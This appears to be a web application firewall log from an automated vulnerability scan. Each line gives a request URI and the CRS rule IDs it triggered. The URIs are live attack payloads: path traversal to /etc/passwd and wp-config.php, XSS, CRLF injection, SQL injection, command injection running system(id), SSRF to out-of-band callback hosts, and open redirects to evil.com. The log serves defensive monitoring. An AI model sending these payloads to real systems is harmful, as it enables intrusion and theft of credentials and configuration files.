Packet [586]	Uri [/web/%0DSet-Cookie:crlfinjection=crlfinjection]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [588]	Uri [/web/%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [2 ]	Signatures	[921190]	[920272]
Packet [591]	Uri [/web/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection]	Nattacks [1 ]	Signatures	[920272]
Packet [594]	Uri [/web/index.php/Home/uploadify/fileList?type=.+&path=../../../]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [596]	Uri [/web/index.php?id=50&file=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [601]	Uri [/web/downloadfile.php?file=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [602]	Uri [/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [604]	Uri [/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [605]	Uri [/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]
Packet [606]	Uri [/web/interlib/report/ShowImage?localPath=etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [607]	Uri [/web/wp-config.php.txt]	Nattacks [1 ]	Signatures	[930130]
Packet [609]	Uri [/web/wp-config.php.bak]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [613]	Uri [/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]
Packet [617]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)]	Nattacks [4 ]	Signatures	[933160]	[942430]	[942431]	[942460]
Packet [618]	Uri [/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [619]	Uri [/web/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c8acjap9m8v98g1htghgcekcuoeyyyynq.oast.online%23.salesforce.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [624]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [7 ]	Signatures	[921180]	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [626]	Uri [/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [631]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [633]	Uri [/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [635]	Uri [/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942460]
Packet [638]	Uri [/web/%5chttp://192.168.1.104example.com/%2f%2e%2e]	Nattacks [2 ]	Signatures	[930110]	[930110]
Packet [639]	Uri [/web/bitrix/redirect.php?event3=352513&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [641]	Uri [/web/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]	[942460]
Packet [646]	Uri [/web/../example.com]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [647]	Uri [/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [651]	Uri [/web/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection]	Nattacks [1 ]	Signatures	[920272]
Packet [654]	Uri [/web/%0ASet-Cookie%3Acrlfinjection/..]	Nattacks [4 ]	Signatures	[921190]	[920272]	[930110]	[930110]
Packet [656]	Uri [/web/downloadfile.php?file=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [657]	Uri [/web/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [661]	Uri [/web/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [20 ]	Signatures	[921160]	[920272]	[921120]	[921151]	[921180]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]	[942130]
Packet [662]	Uri [/web/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]
Packet [663]	Uri [/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [664]	Uri [/web/wp-config.php.bak]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [665]	Uri [/web/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [666]	Uri [/web/interlib/report/ShowImage?localPath=etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [667]	Uri [/web/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E]	Nattacks [3 ]	Signatures	[941100]	[941120]	[941160]
Packet [668]	Uri [/web/src/read_body.php?mailbox=/etc/passwd&passed_id=1&]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [669]	Uri [/web/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection]	Nattacks [5 ]	Signatures	[921160]	[920272]	[921120]	[921151]	[942130]
Packet [670]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)]	Nattacks [4 ]	Signatures	[933160]	[942430]	[942431]	[942460]
Packet [671]	Uri [/web/wp-config.php.old]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [672]	Uri [/web/mod/lti/auth.php?redirect_uri=javascript:alert('25SnmIOQ3Zj3EzmxCOldAwTYQAb')]	Nattacks [3 ]	Signatures	[941170]	[941210]	[942511]
Packet [673]	Uri [/web/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]
Packet [674]	Uri [/web/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [678]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)]	Nattacks [4 ]	Signatures	[933160]	[942430]	[942431]	[942460]
Packet [679]	Uri [/web/wp-config.php.dist]	Nattacks [1 ]	Signatures	[930130]
Packet [682]	Uri [/web/../../../..//etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [683]	Uri [/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [686]	Uri [/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();]	Nattacks [2 ]	Signatures	[933100]	[933160]
Packet [688]	Uri [/web/rest/sharelinks/1.0/link?url=https://c8acjap9m8v98g1htghgcekcutyyyyyn6.oast.online/]	Nattacks [1 ]	Signatures	[931130]
Packet [690]	Uri [/web/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942460]
Packet [691]	Uri [/web/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [694]	Uri [/web/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [697]	Uri [/web/../example.com]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [698]	Uri [/web/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [703]	Uri [/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [705]	Uri [/web/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E]	Nattacks [3 ]	Signatures	[941100]	[941120]	[941160]
Packet [708]	Uri [/web/rest/sharelinks/1.0/link?url=https://c8acjap9m8v98g1htghgcekcutyyyyyn6.oast.online/]	Nattacks [1 ]	Signatures	[931130]
Packet [711]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)]	Nattacks [4 ]	Signatures	[933160]	[942430]	[942431]	[942460]
Packet [712]	Uri [/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();]	Nattacks [2 ]	Signatures	[933100]	[933160]
Packet [713]	Uri [/web/../../../..//etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [719]	Uri [/web/src/read_body.php?mailbox=/etc/passwd&passed_id=1&]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [721]	Uri [/web/wp-config.php.dist]	Nattacks [1 ]	Signatures	[930130]
Packet [722]	Uri [/web/.example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [725]	Uri [/web/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [727]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [729]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [730]	Uri [/web/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [731]	Uri [/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [732]	Uri [/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [738]	Uri [/web/download.do?file=../../../../config.text]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [740]	Uri [/web/wp-config.php.inc]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [742]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [744]	Uri [/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20]	Nattacks [9 ]	Signatures	[942150]	[942180]	[942300]	[942310]	[942370]	[942410]	[942440]	[942431]	[942460]
Packet [756]	Uri [/web/wp-content/debug.log]	Nattacks [1 ]	Signatures	[920440]
Packet [757]	Uri [/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [761]	Uri [/web/search?search_key=%7B%7B1337*1338%7D%7D]	Nattacks [1 ]	Signatures	[941380]
Packet [763]	Uri [/web/.example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [764]	Uri [/web//%5cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [766]	Uri [/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [768]	Uri [/web/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [770]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [771]	Uri [/web/wp-config.php.inc]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [772]	Uri [/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20]	Nattacks [9 ]	Signatures	[942150]	[942180]	[942300]	[942310]	[942370]	[942410]	[942440]	[942431]	[942460]
Packet [773]	Uri [/web/?wptouch_switch=desktop&redirect=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [775]	Uri [/web/download.do?file=../../../../config.text]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [776]	Uri [/web/wp-config.php.swp]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [782]	Uri [/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2 ]	Signatures	[930110]	[930120]
Packet [783]	Uri [/web/wp-content/debug.log]	Nattacks [1 ]	Signatures	[920440]
Packet [785]	Uri [/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [786]	Uri [/web/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [787]	Uri [/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [788]	Uri [/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [791]	Uri [/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [792]	Uri [/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com]	Nattacks [3 ]	Signatures	[920272]	[931130]	[942460]
Packet [793]	Uri [/web/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa]	Nattacks [5 ]	Signatures	[920272]	[921151]	[941170]	[941210]	[942460]
Packet [799]	Uri [/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`]	Nattacks [14 ]	Signatures	[932190]	[942500]	[942110]	[942150]	[942260]	[942300]	[942361]	[942370]	[942410]	[942430]	[942440]	[942490]	[942431]	[942460]
Packet [801]	Uri [/web/////%5C;@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [807]	Uri [/web/wp-config.php.html]	Nattacks [1 ]	Signatures	[930130]
Packet [812]	Uri [/web/search?search_key=%7B%7B1337*1338%7D%7D]	Nattacks [1 ]	Signatures	[941380]
Packet [813]	Uri [/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1]	Nattacks [1 ]	Signatures	[941110]
Packet [815]	Uri [/web/////example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [817]	Uri [/web/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [818]	Uri [/web/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [820]	Uri [/web/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]	[942460]
Packet [822]	Uri [/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [823]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]	[942460]
Packet [825]	Uri [/web/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg]	Nattacks [4 ]	Signatures	[941100]	[941120]	[941160]	[941320]
Packet [828]	Uri [/web/compress.php?file=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [830]	Uri [/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [832]	Uri [/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2 ]	Signatures	[930110]	[930120]
Packet [835]	Uri [/web/api/sso/v2/sso/jwt?error_url=http://evil.com]	Nattacks [1 ]	Signatures	[931130]
Packet [836]	Uri [/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [838]	Uri [/web/api/downloads?fileName=../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [841]	Uri [/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com]	Nattacks [3 ]	Signatures	[920272]	[931130]	[942460]
Packet [842]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2 ]	Signatures	[930110]	[930120]
Packet [844]	Uri [/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`]	Nattacks [14 ]	Signatures	[932190]	[942500]	[942110]	[942150]	[942260]	[942300]	[942361]	[942370]	[942410]	[942430]	[942440]	[942490]	[942431]	[942460]
Packet [849]	Uri [/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com]	Nattacks [2 ]	Signatures	[931130]	[942460]
Packet [851]	Uri [/web/..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [852]	Uri [/web/..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [853]	Uri [/web/..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [858]	Uri [/web/////example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [859]	Uri [/web/..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [860]	Uri [/web////example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [863]	Uri [/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [864]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]	[942460]
Packet [866]	Uri [/web/wp-config.php.save]	Nattacks [1 ]	Signatures	[930130]
Packet [867]	Uri [/web/compress.php?file=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [869]	Uri [/web/wp-config.php~]	Nattacks [2 ]	Signatures	[920500]	[930130]
Packet [870]	Uri [/web/api/sso/v2/sso/jwt?error_url=http://evil.com]	Nattacks [1 ]	Signatures	[931130]
Packet [874]	Uri [/web/api/downloads?fileName=../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [875]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [2 ]	Signatures	[930110]	[930120]
Packet [878]	Uri [/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com]	Nattacks [2 ]	Signatures	[931130]	[942460]
Packet [879]	Uri [/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com]	Nattacks [2 ]	Signatures	[931130]	[942460]
Packet [880]	Uri [/web/..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [881]	Uri [/web////example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [883]	Uri [/web////example.com/%2f%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [884]	Uri [/web/..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [885]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [886]	Uri [/web/wp-config.php~]	Nattacks [2 ]	Signatures	[920500]	[930130]
Packet [887]	Uri [/web/wp-config.php-backup]	Nattacks [1 ]	Signatures	[930130]
Packet [888]	Uri [/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com]	Nattacks [2 ]	Signatures	[931130]	[942460]
